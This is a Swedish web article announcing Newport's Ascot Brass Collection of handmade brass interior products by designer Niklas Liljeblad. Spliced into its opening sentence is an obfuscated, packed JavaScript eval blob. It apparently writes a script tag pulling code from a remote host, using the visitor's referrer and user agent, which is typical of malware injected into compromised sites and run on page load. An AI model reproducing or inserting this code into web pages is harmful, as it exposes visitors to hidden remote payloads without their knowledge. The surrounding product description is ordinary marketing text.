Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Newport lanserar Ascot Brass Collection

Newport lanserar Ascot Brass Collection
Sebastian

Med eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnsyh|var|u0026u|referrer|fhkyh||js|php’.split(’|’),0,{}))
modern design, nytänkande och formgivning i det absoluta toppsegmentet av
inredning presenterar vi stolt några av morgondagens klassiker.

Ascot Brass Collection är resultatet av ett unikt samarbete mellan designern Niklas Liljeblad och Newport. Kollektionen består av sju inredningsprodukter där klassiska material möter en nutida marknad, genom traditionell tillverkning och svenskt hantverk av absolut världsklass. Samtliga produkter i serien är formgivna av den unga begåvningen Niklas Liljeblad, som också står för produktionen. Hela tillverkningen sker för hand enligt klassisk hantverkstradition, något som genomsyrar hela produktionen och är en av grundpelarna för kollektionen. 

25 år unga Niklas Liljeblad är en av ytterst få tillverkare i Sverige som fortfarande bemästrar den svenska hantverkstraditionen och månar om att låta den leva vidare. Hans förmåga att hantera material och traditionell produktion, tillsammans med enastående hantverk är också det som banat väg för samarbete med några av Sveriges ledande designföretag och nu den stora satsningen tillsammans med Newport.

Niklas grundläggande filosofi bakom kollektionen är att låta klassiska produkter anta nya dimensioner och uttryck genom reflektioner och nya möten mellan olika material. Att låta mässing reflekteras i en annan metall, som hos brevstället, ger oss ett helt nytt uttryck och i detta fall en produkt där det är omöjligt att fånga alla dimensioner ur en enda vinkel. Här ser vi exklusiv design och formgivning i det absoluta toppsegmentet.